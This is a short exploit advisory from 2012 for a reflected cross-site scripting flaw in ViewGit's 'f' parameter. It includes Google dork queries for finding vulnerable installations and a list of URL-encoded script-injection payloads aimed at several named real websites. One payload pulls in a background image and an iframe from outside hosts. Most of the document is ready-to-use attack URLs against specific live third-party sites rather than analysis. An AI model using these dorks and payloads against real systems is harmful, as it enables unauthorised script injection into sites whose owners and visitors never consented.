# Exploit Title: ViewGit Cross Site Scripting
# Date: 21.01.2012
# Author: Sony
# Software Link: http://viewgit.fealdia.org/
# Google Dorks: inurl:inurl:/viewgit/?a= or inurl:/viewgit/?a= site:com or
intext:ViewGit
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/01/viewgit-cross-site-scripting.html
..................................................................
http://code.fealdia.org/viewgit/?a=viewblob&p=eircca&h=fdad6b540864d935e0e9cc3d5a99f738fe1569b8&f=[OurXSS
is Here]
Demo:
http://code.fealdia.org/viewgit/?a=viewblob&p=eircca&h=fdad6b540864d935e0e9cc3d5a99f738fe1569b8&f=%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/tum/raz/raztum28.jpg%22%3E%3Cscript%3Ealert%28%22ViewGit%20%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Ciframe%20width=%22540%22%20height=%22450%22%20src=%22http://www.youtube.com/embed/hIYtrNu-VZI%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E
http://git.moodle.cz/?a=tree&p=moodle.git&h=eba8abba2ae3bcf7cdd370494fc7ea9f06f9255d&hb=ba58c9f08e127873a2f4b474d80f0b8963afe0e9&f=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.bluestatic.org/source/?a=viewblob&p=Kalens&h=c47467e34edcdd9b2fc5ab8f214b2dfb7dfa8f2f&hb=14ab9c615454c3abc51f7fbf62062175e89cea09&f=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://wiki.swftools.org/viewgit/?a=tree&p=swftools-git%20&h=eb166a28f1df83798c864f5d7836c09b255da25b&hb=d9afddd85be825c925ec724a80312b2e2433a1c3&f=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
https://opensource.conformal.com/viewgit/?a=viewblob&p=scrotwm&h=5925ff6a2e1c6a6c1c496231b1a7d2d6d82658f3&hb=8eb6cfee6344a0e61511f1eb2e36a91c30854e1e&f=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
etc..